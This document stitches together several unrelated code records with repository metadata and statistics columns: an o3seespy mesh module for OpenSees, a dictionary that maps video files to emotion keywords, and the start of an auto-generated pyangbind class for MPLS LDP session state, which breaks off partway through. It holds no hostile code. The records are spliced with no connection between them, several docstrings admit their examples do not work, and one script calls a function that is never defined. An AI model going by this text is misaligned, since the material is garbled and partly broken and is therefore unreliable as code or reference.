e3e5f07aadb3fd15634c35d4c004a5cba3198313
| 23,396
|
py
|
Python
|
o3seespy/command/mesh.py
|
o3seespy/o3seespy
|
4fdd942370df1ac8d454e361f651405717b8584c
|
[
"MIT",
"BSD-3-Clause"
] | 16
|
2019-10-24T17:58:46.000Z
|
2022-03-01T19:48:06.000Z
|
o3seespy/command/mesh.py
|
o3seespy/o3seespy
|
4fdd942370df1ac8d454e361f651405717b8584c
|
[
"MIT",
"BSD-3-Clause"
] | 5
|
2020-04-17T01:39:27.000Z
|
2020-12-18T05:07:58.000Z
|
o3seespy/command/mesh.py
|
o3seespy/o3seespy
|
4fdd942370df1ac8d454e361f651405717b8584c
|
[
"MIT",
"BSD-3-Clause"
] | 6
|
2020-02-20T02:13:11.000Z
|
2021-11-01T19:08:41.000Z
|
from o3seespy.base_model import OpenSeesObject
class MeshBase(OpenSeesObject):
op_base_type = "mesh"
class Line(MeshBase):
"""
The Line Mesh Class
Create a line mesh object.
"""
op_type = 'line'
def __init__(self, osi, numnodes, ndtags, id, ndf, meshsize, ele_type='', ele_args: float=None):
"""
Initial method for Line
Parameters
----------
osi: o3seespy.OpenSeesInstance
numnodes: int
Number of nodes for defining consective lines.
ndtags: list
The node objects
id: int
Mesh id. meshes with same id are considered as same structure of fluid identity. * ``id`` = 0 : not in fsi *
``id`` > 0 : structure * ``id`` < 0 : fluid
ndf: int
Ndf for nodes to be created.
meshsize: float
Mesh size.
ele_type: str, optional
The type of the element, * :ref:`elasticbeamcolumn` * :ref:`forcebeamcolumn-element` *
:ref:`dispbeamcolumn-element` if no type is given, only nodes are created
ele_args: list (default=True), optional
A list of element arguments. the arguments are same as in the element commands, but without element object,
and node objects. for example, ``eleargs = ['elasticbeamcolumn', a, e, iz, transfobject]``
Examples
--------
>>> import o3seespy as o3
>>> # Example is currently not working
>>> osi = o3.OpenSeesInstance(ndm=2)
>>> coords = [[0, 0], [0, 0]]
>>> ele_nodes = [o3.node.Node(osi, *coords[x]) for x in range(2)]
>>> o3.mesh.Line(osi, numnodes=1, ndtags=ele_nodes, id=1, ndf=1, meshsize=1.0, ele_type='', ele_args=None)
"""
self.osi = osi
self.numnodes = int(numnodes)
self.ndtags = ndtags
self.id = int(id)
self.ndf = int(ndf)
self.meshsize = float(meshsize)
self.ele_type = ele_type
self.ele_args = ele_args
osi.n_mesh += 1
self._tag = osi.n_mesh
self._parameters = [self.op_type, self._tag, self.numnodes, *self.ndtags, self.id, self.ndf, self.meshsize, self.ele_type]
special_pms = ['ele_args']
packets = [True]
for i, pm in enumerate(special_pms):
if getattr(self, pm) is not None:
if packets[i]:
self._parameters += [*getattr(self, pm)]
else:
self._parameters += [getattr(self, pm)]
else:
break
self.to_process(osi)
class Tri(MeshBase):
"""
The Tri Mesh Class
Create a triangular mesh object.
"""
op_type = 'tri'
def __init__(self, osi, numlines, ltags, id, ndf, meshsize, ele_type='', ele_args: float=None):
"""
Initial method for Tri
Parameters
----------
osi: o3seespy.OpenSeesInstance
numlines: int
Number of lines (:ref:`linemesh`) for defining a polygon.
ltags: list
The :ref:`linemesh` objects
id: int
Mesh id. meshes with same id are considered as same structure of fluid identity. * ``id`` = 0 : not in fsi *
``id`` > 0 : structure * ``id`` < 0 : fluid
ndf: int
Ndf for nodes to be created.
meshsize: float
Mesh size.
ele_type: str, optional
The element type, * :doc:`pfemelementbubble` * :doc:`pfemelementcompressible` * :doc:`tri31` *
:doc:`elasticbeamcolumn` * :doc:`forcebeamcolumn` * :doc:`dispbeamcolumn` if no type is given, only nodes
are created. if beam elements are given, beams are created instead of triangular elements.
ele_args: list (default=True), optional
A list of element arguments. the arguments are same as in the element commands, but without element object,
and node objects. for example, ``eleargs = ['pfemelementbubble', rho, mu, b1, b2, thickness, kappa]``
Examples
--------
>>> import o3seespy as o3
>>> # Example is currently not working
>>> osi = o3.OpenSeesInstance(ndm=2)
>>> ltags = [1, 1]
>>> o3.mesh.Tri(osi, numlines=1, ltags=ltags, id=1, ndf=1, meshsize=1.0, ele_type='', ele_args=None)
"""
self.osi = osi
self.numlines = int(numlines)
self.ltags = ltags
self.id = int(id)
self.ndf = int(ndf)
self.meshsize = float(meshsize)
self.ele_type = ele_type
self.ele_args = ele_args
osi.n_mesh += 1
self._tag = osi.n_mesh
self._parameters = [self.op_type, self._tag, self.numlines, *self.ltags, self.id, self.ndf, self.meshsize, self.ele_type]
special_pms = ['ele_args']
packets = [True]
for i, pm in enumerate(special_pms):
if getattr(self, pm) is not None:
if packets[i]:
self._parameters += [*getattr(self, pm)]
else:
self._parameters += [getattr(self, pm)]
else:
break
self.to_process(osi)
class Quad(MeshBase):
"""
The Quad Mesh Class
Create a quad mesh object. The number of lines must be 4. These lines are continuousto form a loop.
"""
op_type = 'quad'
def __init__(self, osi, numlines, ltags, id, ndf, meshsize, ele_type='', ele_args: float=None):
"""
Initial method for Quad
Parameters
----------
osi: o3seespy.OpenSeesInstance
numlines: int
Number of lines (:ref:`linemesh`) for defining a polygon.
ltags: list
The :ref:`linemesh` objects
id: int
Mesh id. meshes with same id are considered as same structure of fluid identity. * ``id`` = 0 : not in fsi *
``id`` > 0 : structure * ``id`` < 0 : fluid
ndf: int
Ndf for nodes to be created.
meshsize: float
Mesh size.
ele_type: str, optional
The element type, * :doc:`pfemelementbubble` * :doc:`pfemelementcompressible` * :doc:`tri31` *
:doc:`elasticbeamcolumn` * :doc:`forcebeamcolumn` * :doc:`dispbeamcolumn` * :doc:`shellmitc4` if no type
is given, only nodes are created. if beam elements are given, beams are created instead of quad
elements. if triangular elements are given, they are created by dividing one quad to two triangles.
ele_args: list (default=True), optional
A list of element arguments. the arguments are same as in the element commands, but without element object,
and node objects. for example, ``eleargs = ['pfemelementbubble', rho, mu, b1, b2, thickness, kappa]``
Examples
--------
>>> import o3seespy as o3
>>> # Example is currently not working
>>> osi = o3.OpenSeesInstance(ndm=2)
>>> ltags = [1, 1]
>>> o3.mesh.Quad(osi, numlines=1, ltags=ltags, id=1, ndf=1, meshsize=1.0, ele_type='', ele_args=None)
"""
self.osi = osi
self.numlines = int(numlines)
self.ltags = ltags
self.id = int(id)
self.ndf = int(ndf)
self.meshsize = float(meshsize)
self.ele_type = ele_type
self.ele_args = ele_args
osi.n_mesh += 1
self._tag = osi.n_mesh
self._parameters = [self.op_type, self._tag, self.numlines, *self.ltags, self.id, self.ndf, self.meshsize, self.ele_type]
special_pms = ['ele_args']
packets = [True]
for i, pm in enumerate(special_pms):
if getattr(self, pm) is not None:
if packets[i]:
self._parameters += [*getattr(self, pm)]
else:
self._parameters += [getattr(self, pm)]
else:
break
self.to_process(osi)
class Tet(MeshBase):
"""
The Tet Mesh Class
Create a 3D tetrahedron mesh object.
"""
op_type = 'tet'
def __init__(self, osi, nummesh, mtags, id, ndf, meshsize, ele_type='', ele_args: float=None):
"""
Initial method for Tet
Parameters
----------
osi: o3seespy.OpenSeesInstance
nummesh: int
Number of 2d mesh for defining a 3d body.
mtags: list
The mesh objects
id: int
Mesh id. meshes with same id are considered as same structure of fluid identity. * ``id`` = 0 : not in fsi *
``id`` > 0 : structure * ``id`` < 0 : fluid
ndf: int
Ndf for nodes to be created.
meshsize: float
Mesh size.
ele_type: str, optional
The element type, * :doc:`fournodetetrahedron` if no type is given, only nodes are created.
ele_args: list (default=True), optional
A list of element arguments. the arguments are same as in the element commands, but without element object,
and node objects.
Examples
--------
>>> import o3seespy as o3
>>> # Example is currently not working
>>> osi = o3.OpenSeesInstance(ndm=2)
>>> mtags = [1, 1]
>>> o3.mesh.Tet(osi, nummesh=1, mtags=mtags, id=1, ndf=1, meshsize=1.0, ele_type='', ele_args=None)
"""
self.osi = osi
self.nummesh = int(nummesh)
self.mtags = mtags
self.id = int(id)
self.ndf = int(ndf)
self.meshsize = float(meshsize)
self.ele_type = ele_type
self.ele_args = ele_args
osi.n_mesh += 1
self._tag = osi.n_mesh
self._parameters = [self.op_type, self._tag, self.nummesh, *self.mtags, self.id, self.ndf, self.meshsize, self.ele_type]
special_pms = ['ele_args']
packets = [True]
for i, pm in enumerate(special_pms):
if getattr(self, pm) is not None:
if packets[i]:
self._parameters += [*getattr(self, pm)]
else:
self._parameters += [getattr(self, pm)]
else:
break
self.to_process(osi)
class Partvel(MeshBase):
"""
The Partvel Mesh Class
Create or return a group of particles which will be used for background mesh.
"""
op_type = 'part'
def __init__(self, osi, otype, p_args, vel0, ele_type='', ele_args: float=None):
"""
Initial method for Partvel
Parameters
----------
osi: o3seespy.OpenSeesInstance
otype: str
Type of the mesh
p_args: list
Coordinates of points defining the mesh region and z directions * ``'quad'`` : [x1, y1, x2, y2, x3, y3, x4,
y4, nx, ny] coordinates of four corners in counter-clock wise order. * ``'cube'`` : [x1, y1, z1, x2, y2, z2, x3, y3,
z3, x4, y4, z4, x5, y5, z5, x6, y6, z6, x7, y7, z7, x8, y8, z8, nx, ny, nz] coordinates of four corners at bottom
and at top in counter-clock wise order * ``'tri'`` : [x1, y1, x2, y2, x3, y3, nx, ny] coordinates of three
corners in counter-clock wise order * ``'line'`` : [x1, y1, x2, y2, nx] coordinates of two ends in
counter-clock wise order * ``'pointlist'`` : [x1, y1, <z1>, vx1, vy1, <vz1>, ax1, ay1, <az1>, p1,
x2, y2, <z2>, vx2, vy2, <vz2>, ax2, ay2, <az2>, p2, ..] input particles' data in a list, in the
order of coordinates of last time step, current coordinates, velocity, acceleration, and
pressure. * ``'pointlist'`` without list return a list of current particles' data in
this mesh [object1, x1, y1, <z1>, vx1, vy1, <vz1>, ax1, ay1, <az1>, p1, object2,
x2, y2, <z2>, vx2, vy2, <vz2>, ax2, ay2, <az2>, p2, ..] the format is similar
to the input list, but with an additional object for each particle.
vel0: list
A list of initial velocities.
ele_type: str, optional
The element type, * :doc:`pfemelementbubble` * :doc:`pfemelementcompressible` * :doc:`tri31` if no type is
given, only nodes are created
ele_args: list (default=True), optional
A list of element arguments. (optional, see :doc:`linemesh` and :doc:`trimesh`)
Examples
--------
>>> import o3seespy as o3
>>> # Example is currently not working
>>> osi = o3.OpenSeesInstance(ndm=2)
>>> p_args = [1.0, 1.0]
>>> vel0 = [1.0, 1.0]
>>> o3.mesh.Partvel(osi, otype="string", p_args=p_args, ele_type='', ele_args=None, vel0=vel0)
"""
self.osi = osi
self.otype = otype
self.p_args = p_args
self.ele_type = ele_type
self.ele_args = ele_args
self.vel0 = vel0
osi.n_mesh += 1
self._tag = osi.n_mesh
self._parameters = [self.op_type, self._tag, self.otype, *self.p_args, self.ele_type]
special_pms = ['ele_args', 'vel0', 'p0']
packets = [True, True, False]
for i, pm in enumerate(special_pms):
if getattr(self, pm) is not None:
if packets[i]:
self._parameters += [*getattr(self, pm)]
else:
self._parameters += [getattr(self, pm)]
else:
break
self.to_process(osi)
class Partpressure(MeshBase):
"""
The Partpressure Mesh Class
Create or return a group of particles which will be used for background mesh.
"""
op_type = 'part'
def __init__(self, osi, otype, p_args, p0, ele_type='', ele_args: float=None):
"""
Initial method for Partpressure
Parameters
----------
osi: o3seespy.OpenSeesInstance
otype: str
Type of the mesh
p_args: list
Coordinates of points defining the mesh region and z directions * ``'quad'`` : [x1, y1, x2, y2, x3, y3, x4,
y4, nx, ny] coordinates of four corners in counter-clock wise order. * ``'cube'`` : [x1, y1, z1, x2, y2, z2, x3, y3,
z3, x4, y4, z4, x5, y5, z5, x6, y6, z6, x7, y7, z7, x8, y8, z8, nx, ny, nz] coordinates of four corners at bottom
and at top in counter-clock wise order * ``'tri'`` : [x1, y1, x2, y2, x3, y3, nx, ny] coordinates of three
corners in counter-clock wise order * ``'line'`` : [x1, y1, x2, y2, nx] coordinates of two ends in
counter-clock wise order * ``'pointlist'`` : [x1, y1, <z1>, vx1, vy1, <vz1>, ax1, ay1, <az1>, p1,
x2, y2, <z2>, vx2, vy2, <vz2>, ax2, ay2, <az2>, p2, ..] input particles' data in a list, in the
order of coordinates of last time step, current coordinates, velocity, acceleration, and
pressure. * ``'pointlist'`` without list return a list of current particles' data in
this mesh [object1, x1, y1, <z1>, vx1, vy1, <vz1>, ax1, ay1, <az1>, p1, object2,
x2, y2, <z2>, vx2, vy2, <vz2>, ax2, ay2, <az2>, p2, ..] the format is similar
to the input list, but with an additional object for each particle.
p0: float
Initial pressure.
ele_type: str, optional
The element type, * :doc:`pfemelementbubble` * :doc:`pfemelementcompressible` * :doc:`tri31` if no type is
given, only nodes are created
ele_args: list (default=True), optional
A list of element arguments. (optional, see :doc:`linemesh` and :doc:`trimesh`)
Examples
--------
>>> import o3seespy as o3
>>> # Example is currently not working
>>> osi = o3.OpenSeesInstance(ndm=2)
>>> p_args = [1.0, 1.0]
>>> o3.mesh.Partpressure(osi, otype="string", p_args=p_args, ele_type='', ele_args=None, p0=1.0)
"""
self.osi = osi
self.otype = otype
self.p_args = p_args
self.ele_type = ele_type
self.ele_args = ele_args
self.p0 = float(p0)
osi.n_mesh += 1
self._tag = osi.n_mesh
self._parameters = [self.op_type, self._tag, self.otype, *self.p_args, self.ele_type]
special_pms = ['ele_args', 'vel0', 'p0']
packets = [True, True, False]
for i, pm in enumerate(special_pms):
if getattr(self, pm) is not None:
if packets[i]:
self._parameters += [*getattr(self, pm)]
else:
self._parameters += [getattr(self, pm)]
else:
break
self.to_process(osi)
class Bgwave(MeshBase):
"""
The Bgwave Mesh Class
Create a background mesh.
"""
op_type = 'bg'
def __init__(self, osi, lower, upper, wavefilename, numl, locations, tol: float=None, meshtol: float=None, numsub=None):
"""
Initial method for Bgwave
Parameters
----------
osi: o3seespy.OpenSeesInstance
lower: list
A list of coordinates of the lower point of the background region.
upper: list
A list of coordinates of the uuper point of the background region.
wavefilename: str
A filename to record wave heights and velocities
numl: int
Number of locations to record wave
locations: list
Coordinates of the locations
tol: float, optional
Tolerance for intri check. (optional, default 1e-10)
meshtol: float, optional
Tolerance for cell boundary check. (optional, default 0.1)
numsub: None, optional
Examples
--------
>>> import o3seespy as o3
>>> # Example is currently not working
>>> osi = o3.OpenSeesInstance(ndm=2)
>>> lower = [1.0, 1.0]
>>> upper = [1.0, 1.0]
>>> locations = [1.0, 1.0]
>>> o3.mesh.Bgwave(osi, lower=lower, upper=upper, tol=1.0, meshtol=1.0, wavefilename="string", numl=1, locations=locations, numsub=1)
"""
self.osi = osi
self.lower = lower
self.upper = upper
if tol is None:
self.tol = None
else:
self.tol = float(tol)
if meshtol is None:
self.meshtol = None
else:
self.meshtol = float(meshtol)
self.wavefilename = wavefilename
self.numl = int(numl)
self.locations = locations
self.numsub = numsub
osi.n_mesh += 1
self._tag = osi.n_mesh
self._parameters = [self.op_type, self._tag, *self.lower, *self.upper, '-wave', self.wavefilename, self.numl, *self.locations]
if getattr(self, 'tol') is not None:
self._parameters += ['-tol', self.tol]
if getattr(self, 'meshtol') is not None:
self._parameters += ['-meshtol', self.meshtol]
if getattr(self, 'numsub') is not None:
self._parameters += ['-numsub', self.numsub]
self.to_process(osi)
class Bgstructure(MeshBase):
"""
The Bgstructure Mesh Class
Create a background mesh.
"""
op_type = 'bg'
def __init__(self, osi, lower, upper, id, numnodes, snodes, tol: float=None, meshtol: float=None):
"""
Initial method for Bgstructure
Parameters
----------
osi: o3seespy.OpenSeesInstance
lower: list
A list of coordinates of the lower point of the background region.
upper: list
A list of coordinates of the uuper point of the background region.
id: int
Structural id > 0, same meaning as :doc:`trimesh`
numnodes: None
snodes: None
tol: float, optional
Tolerance for intri check. (optional, default 1e-10)
meshtol: float, optional
Tolerance for cell boundary check. (optional, default 0.1)
Examples
--------
>>> import o3seespy as o3
>>> # Example is currently not working
>>> osi = o3.OpenSeesInstance(ndm=2)
>>> lower = [1.0, 1.0]
>>> upper = [1.0, 1.0]
>>> o3.mesh.Bgstructure(osi, lower=lower, upper=upper, tol=1.0, meshtol=1.0, id=1, numnodes=1, snodes=1)
"""
self.osi = osi
self.lower = lower
self.upper = upper
if tol is None:
self.tol = None
else:
self.tol = float(tol)
if meshtol is None:
self.meshtol = None
else:
self.meshtol = float(meshtol)
self.id = int(id)
self.numnodes = numnodes
self.snodes = snodes
osi.n_mesh += 1
self._tag = osi.n_mesh
self._parameters = [self.op_type, self._tag, *self.lower, *self.upper, '-structure', self.id, self.numnodes, *self.snodes]
if getattr(self, 'tol') is not None:
self._parameters += ['-tol', self.tol]
if getattr(self, 'meshtol') is not None:
self._parameters += ['-meshtol', self.meshtol]
self.to_process(osi)
class BglargeSize(MeshBase):
"""
The BglargeSize Mesh Class
Create a background mesh.
"""
op_type = 'bg'
def __init__(self, osi, lower, upper, level, llower, lupper, tol: float=None, meshtol: float=None):
"""
Initial method for BglargeSize
Parameters
----------
osi: o3seespy.OpenSeesInstance
lower: list
A list of coordinates of the lower point of the background region.
upper: list
A list of coordinates of the uuper point of the background region.
level: int
Some regions can have larger mesh size with larger ``level``. ``level = 1`` means same as basic mesh size.
llower: list
A list of coordinates of the lower point of the region with larger mesh size
lupper: list
A list of coordinates of the upper point of the region with larger mesh size
tol: float, optional
Tolerance for intri check. (optional, default 1e-10)
meshtol: float, optional
Tolerance for cell boundary check. (optional, default 0.1)
Examples
--------
>>> import o3seespy as o3
>>> # Example is currently not working
>>> osi = o3.OpenSeesInstance(ndm=2)
>>> lower = [1.0, 1.0]
>>> upper = [1.0, 1.0]
>>> llower = [1.0, 1.0]
>>> lupper = [1.0, 1.0]
>>> o3.mesh.BglargeSize(osi, lower=lower, upper=upper, tol=1.0, meshtol=1.0, level=1, llower=llower, lupper=lupper)
"""
self.osi = osi
self.lower = lower
self.upper = upper
if tol is None:
self.tol = None
else:
self.tol = float(tol)
if meshtol is None:
self.meshtol = None
else:
self.meshtol = float(meshtol)
self.level = int(level)
self.llower = llower
self.lupper = lupper
osi.n_mesh += 1
self._tag = osi.n_mesh
self._parameters = [self.op_type, self._tag, *self.lower, *self.upper, '-largeSize', self.level, *self.llower, *self.lupper]
if getattr(self, 'tol') is not None:
self._parameters += ['-tol', self.tol]
if getattr(self, 'meshtol') is not None:
self._parameters += ['-meshtol', self.meshtol]
self.to_process(osi)
| 38.993333
| 141
| 0.558472
| 2,935
| 23,396
| 4.372743
| 0.097104
| 0.019635
| 0.014025
| 0.01309
| 0.821022
| 0.816347
| 0.810893
| 0.808789
| 0.80427
| 0.791336
| 0
| 0.024965
| 0.32544
| 23,396
| 599
| 142
| 39.058431
| 0.78824
| 0.513806
| 0
| 0.801762
| 0
| 0
| 0.021993
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039648
| false
| 0
| 0.004405
| 0
| 0.132159
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
541a4aa672e4d74509e6ab096ec89ff2b6f924f2
| 7,509
|
py
|
Python
|
PSYC15_Project_dynamic2/dictionary_vid.py
|
fooledyouonce/FacialRecognition
|
df4ee623a4f06f7a4fda8a33449b783196a814d7
|
[
"Apache-2.0"
] | null | null | null |
PSYC15_Project_dynamic2/dictionary_vid.py
|
fooledyouonce/FacialRecognition
|
df4ee623a4f06f7a4fda8a33449b783196a814d7
|
[
"Apache-2.0"
] | null | null | null |
PSYC15_Project_dynamic2/dictionary_vid.py
|
fooledyouonce/FacialRecognition
|
df4ee623a4f06f7a4fda8a33449b783196a814d7
|
[
"Apache-2.0"
] | 1
|
2022-02-25T17:27:20.000Z
|
2022-02-25T17:27:20.000Z
|
import os
def getKey(video):
trial_dict = {'vid111.mp4':['angry','anger','mad','frustrated','upset','rage','enraged','furious','hate','hatred','fury','frustration','irritated','irritation','seething','infuriated','livid','pissed','pissed off'],\
'vid112.mp4':['angry','anger','mad','frustrated','upset','rage','enraged','furious','hate','hatred','fury','frustration','irritated','irritation','seething','infuriated','livid','pissed','pissed off'],\
'vid113.mp4':['angry','anger','mad','frustrated','upset','rage','enraged','furious','hate','hatred','fury','frustration','irritated','irritation','seething','infuriated','livid','pissed','pissed off'],\
'vid114.mp4':['angry','anger','mad','frustrated','upset','rage','enraged','furious','hate','hatred','fury','frustration','irritated','irritation','seething','infuriated','livid','pissed','pissed off'],\
'vid115.mp4':['angry','anger','mad','frustrated','upset','rage','enraged','furious','hate','hatred','fury','frustration','irritated','irritation','seething','infuriated','livid','pissed','pissed off'],\
'vid116.mp4':['angry','anger','mad','frustrated','upset','rage','enraged','furious','hate','hatred','fury','frustration','irritated','irritation','seething','infuriated','livid','pissed','pissed off'],\
'vid117.mp4':['disgust','disgusted','repulsed','horror','sickened','revulsion','detest','nausea','distaste','grossed out','contempt'],\
'vid118.mp4':['disgust','disgusted','repulsed','horror','sickened','revulsion','detest','nausea','distaste','grossed out','contempt'],\
'vid119.mp4':['disgust','disgusted','repulsed','horror','sickened','revulsion','detest','nausea','distaste','grossed out','contempt'],\
'vid120.mp4':['disgust','disgusted','repulsed','horror','sickened','revulsion','detest','nausea','distaste','grossed out','contempt'],\
'vid121.mp4':['disgust','disgusted','repulsed','horror','sickened','revulsion','detest','nausea','distaste','grossed out','contempt'],\
'vid122.mp4':['disgust','disgusted','repulsed','horror','sickened','revulsion','detest','nausea','distaste','grossed out','contempt'],\
'vid123.mp4':['afraid','scared','fear','frightened','nervous','terrified','terror','alarm','dread','fright','fearful'],\
'vid124.mp4':['afraid','scared','fear','frightened','nervous','terrified','terror','alarm','dread','fright','fearful'],\
'vid125.mp4':['afraid','scared','fear','frightened','nervous','terrified','terror','alarm','dread','fright','fearful'],\
'vid126.mp4':['afraid','scared','fear','frightened','nervous','terrified','terror','alarm','dread','fright','fearful'],\
'vid127.mp4':['afraid','scared','fear','frightened','nervous','terrified','terror','alarm','dread','fright','fearful'],\
'vid128.mp4':['afraid','scared','fear','frightened','nervous','terrified','terror','alarm','dread','fright','fearful'],\
'vid129.mp4':['happy','glad','joyful','joy','content','satisfied','cheer','cheerful','smile','smiling','merry','elated','delighted','amused','enjoyed','enjoyment','enjoy','jublient'],\
'vid130.mp4':['happy','glad','joyful','joy','content','satisfied','cheer','cheerful','smile','smiling','merry','elated','delighted','amused','enjoyed','enjoyment','enjoy','jublient'],\
'vid131.mp4':['happy','glad','joyful','joy','content','satisfied','cheer','cheerful','smile','smiling','merry','elated','delighted','amused','enjoyed','enjoyment','enjoy','jublient'],\
'vid132.mp4':['happy','glad','joyful','joy','content','satisfied','cheer','cheerful','smile','smiling','merry','elated','delighted','amused','enjoyed','enjoyment','enjoy','jublient'],\
'vid133.mp4':['happy','glad','joyful','joy','content','satisfied','cheer','cheerful','smile','smiling','merry','elated','delighted','amused','enjoyed','enjoyment','enjoy','jublient'],\
'vid134.mp4':['happy','glad','joyful','joy','content','satisfied','cheer','cheerful','smile','smiling','merry','elated','delighted','amused','enjoyed','enjoyment','enjoy','jublient'],\
'vid135.mp4':['sad','unhappy','depressed','down','gloomy','miserable','anguish','sorrowful','regret','desolate','inconsolable','sadness','defeated','upset','grief','grieving','distraught','sorrow','devastated','disheartened','heartbroken','downcast','despair'],\
'vid136.mp4':['sad','unhappy','depressed','down','gloomy','miserable','anguish','sorrowful','regret','desolate','inconsolable','sadness','defeated','upset','grief','grieving','distraught','sorrow','devastated','disheartened','heartbroken','downcast','despair'],\
'vid137.mp4':['sad','unhappy','depressed','down','gloomy','miserable','anguish','sorrowful','regret','desolate','inconsolable','sadness','defeated','upset','grief','grieving','distraught','sorrow','devastated','disheartened','heartbroken','downcast','despair'],\
'vid138.mp4':['sad','unhappy','depressed','down','gloomy','miserable','anguish','sorrowful','regret','desolate','inconsolable','sadness','defeated','upset','grief','grieving','distraught','sorrow','devastated','disheartened','heartbroken','downcast','despair'],\
'vid139.mp4':['sad','unhappy','depressed','down','gloomy','miserable','anguish','sorrowful','regret','desolate','inconsolable','sadness','defeated','upset','grief','grieving','distraught','sorrow','devastated','disheartened','heartbroken','downcast','despair'],\
'vid140.mp4':['sad','unhappy','depressed','down','gloomy','miserable','anguish','sorrowful','regret','desolate','inconsolable','sadness','defeated','upset','grief','grieving','distraught','sorrow','devastated','disheartened','heartbroken','downcast','despair'],\
'vid141.mp4':['surprise','surprised','shock','shocked','amazed','astonished','astound','stunned','startled','speechless','unbelievable','disbelief','realization','dumbfounded','realize','flabbergasted'],\
'vid142.mp4':['surprise','surprised','shock','shocked','amazed','astonished','astound','stunned','startled','speechless','unbelievable','disbelief','realization','dumbfounded','realize','flabbergasted'],\
'vid143.mp4':['surprise','surprised','shock','shocked','amazed','astonished','astound','stunned','startled','speechless','unbelievable','disbelief','realization','dumbfounded','realize','flabbergasted'],\
'vid144.mp4':['surprise','surprised','shock','shocked','amazed','astonished','astound','stunned','startled','speechless','unbelievable','disbelief','realization','dumbfounded','realize','flabbergasted'],\
'vid145.mp4':['surprise','surprised','shock','shocked','amazed','astonished','astound','stunned','startled','speechless','unbelievable','disbelief','realization','dumbfounded','realize','flabbergasted'],\
'vid146.mp4':['surprise','surprised','shock','shocked','amazed','astonished','astound','stunned','startled','speechless','unbelievable','disbelief','realization','dumbfounded','realize','flabbergasted']}
values = trial_dict[video]
return values
if __name__ == "__main__":
dictionary_vid()
| 147.235294
| 281
| 0.62738
| 690
| 7,509
| 6.811594
| 0.215942
| 0.010213
| 0.016596
| 0.020426
| 0.935745
| 0.935745
| 0.935745
| 0.935745
| 0.935745
| 0.935745
| 0
| 0.021362
| 0.102277
| 7,509
| 50
| 282
| 150.18
| 0.675864
| 0
| 0
| 0
| 0
| 0
| 0.626089
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02381
| false
| 0
| 0.02381
| 0
| 0.071429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
581863980b253f2a780fe7a96940ae190b196761
| 169,861
|
py
|
Python
|
pybind/slxos/v16r_1_00b/mpls_state/ldp/ldp_session/__init__.py
|
shivharis/pybind
|
4e1c6d54b9fd722ccec25546ba2413d79ce337e6
|
[
"Apache-2.0"
] | null | null | null |
pybind/slxos/v16r_1_00b/mpls_state/ldp/ldp_session/__init__.py
|
shivharis/pybind
|
4e1c6d54b9fd722ccec25546ba2413d79ce337e6
|
[
"Apache-2.0"
] | null | null | null |
pybind/slxos/v16r_1_00b/mpls_state/ldp/ldp_session/__init__.py
|
shivharis/pybind
|
4e1c6d54b9fd722ccec25546ba2413d79ce337e6
|
[
"Apache-2.0"
] | 1
|
2021-11-05T22:15:42.000Z
|
2021-11-05T22:15:42.000Z
|
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import session_ldp_stats
import filtered_fecs_in
import filtered_fecs_out
class ldp_session(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-mpls-operational - based on the path /mpls-state/ldp/ldp-session. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description:
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__peer_ldp_id','__peer_lblspc_id','__state','__adjacency','__role','__max_hold','__time_left','__session_status','__local_ldp_id','__local_lblspc_id','__next_keepalive','__entity_index','__targeted_adj_added','__is_retry','__next_retry','__keepalive_interval','__local_keepalive_timeout','__peer_proposed_keepalive_timeout','__session_up_time','__md5_auth_key','__tcp_conn_local','__tcp_conn_remote','__tcp_state','__num_fecs_received_from_peer','__num_fecs_installed_from_peer','__is_fecs_pending_uninstall','__num_fecs_filtered_out','__num_fecs_filtered_in','__filter_prefix_list_name','__filter_prefix_list_exists','__is_only_gr_valid','__gr_enabled','__peer_reconnect_time','__peer_recovery_time','__reconnect_time_in_use','__reconnect_time_remaining','__recovery_time_in_use','__recovery_time_remaining','__gr_state','__local_eol_unrecognized_notification','__remote_eol_unrecognized_notification','__does_session_support_eol','__local_state','__remote_state','__eol_notification_time','__eol_notification_time_remaining','__eol_tx_label_silence_time','__eol_tx_label_silence_time_remaining','__eol_rx_label_silence_time','__eol_rx_label_silence_time_remaining','__filtered','__interfaces','__addresses','__session_ldp_stats','__filtered_fecs_in','__filtered_fecs_out',)
_yang_name = 'ldp-session'
_rest_name = 'ldp-session'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__local_ldp_id = YANGDynClass(base=unicode, is_leaf=True, yang_name="local-ldp-id", rest_name="local-ldp-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
